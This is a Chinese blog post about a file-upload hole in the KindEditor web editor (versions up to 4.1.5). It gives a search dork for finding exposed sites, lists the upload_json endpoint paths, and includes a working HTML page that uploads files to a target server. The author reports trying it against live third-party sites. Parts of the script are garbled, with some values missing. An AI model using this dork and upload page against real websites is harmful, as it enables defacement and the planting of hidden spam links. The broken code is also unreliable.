kindeditor<=4.1.5文件上传漏洞
2024-08-23 06:41:00
最近发现很多网页篡改与暗链都是利用kindeditor编辑器,于是搜了一下kindeditor的漏洞,发现低于4.1.5版本的存在文件上传的漏洞,可以上传txt,html后缀的文档,许多恶意的文档貌似都是这样上传上去的。
但是实际测试过程中还未找到可上传html的站点,txt文档倒是可以上传。做个测试记录
google搜素一些存在的站点 inurl:kindeditor
根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在
/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php
然后查看版本信息http://www.XXX/kindeditor/kindeditor.js
版本是4.1.10可以进行尝试http://www.XXX/kindeditor/asp.net/upload_json.ashx?dir=file存在有必要验证文件 upload_json.*
/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php
playload构造
<html><head>
<title>For TEST</title>
<script src="http://www.XXX/kindeditor/kindeditor.js"></script>
<script>
KindEditor.ready(function(K) {
var uploadbutton = K.uploadbutton({
button : K('#uploadButton')[],
fieldName : 'imgFile',
url : 'http://www.XXX/kindeditor/asp.net/upload_json.ashx?dir=file',
afterUpload : function(data) {
if (data.error === ) {
var url = K.formatUrl(data.url, 'absolute');
K('#url').val(url);}
},
});
uploadbutton.fileBox.change(function(e) {
uploadbutton.submit();
});
});
</script></head><body>
<div class="upload">
<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
<input type="button" id="uploadButton" value="Upload" />
</div>
</body>
</html>
上传txt文档有路径地址
在页面端访问
发现一个可以上传html文档的网站
最新文章
- redis成长之路——(一)
- ABP框架 - 应用服务
- TF-IDF提取行业关键词
- Run P4 without P4factory - A Simple Example In Tutorials.
- YUSE_DOWN-批下载
- 【记忆化搜索】Codeforces Round #295 (Div. 2) B - Two Buttons
- Spring+MyBatis实践—MyBatis数据库访问
- HDU-4972 A simple dynamic programming problem
- C和指针c6-1
- 用Dart开发Android应用(sky应用)
- Python多线程和多进程谁更快?
- spring异常处理器
- 【Android 应用开发】 Fragment 详解
- setTimeout循环传参数几种方式
- android 生成、pull解析xml文件
- Smartmontools硬盘检测工具
- 自动化测试之selenium工具简单介绍
- volley的post请求
- 【angular5项目积累总结】结合adal4实现http拦截器(token)
- 高校区LAN局域网校内网组建实践经验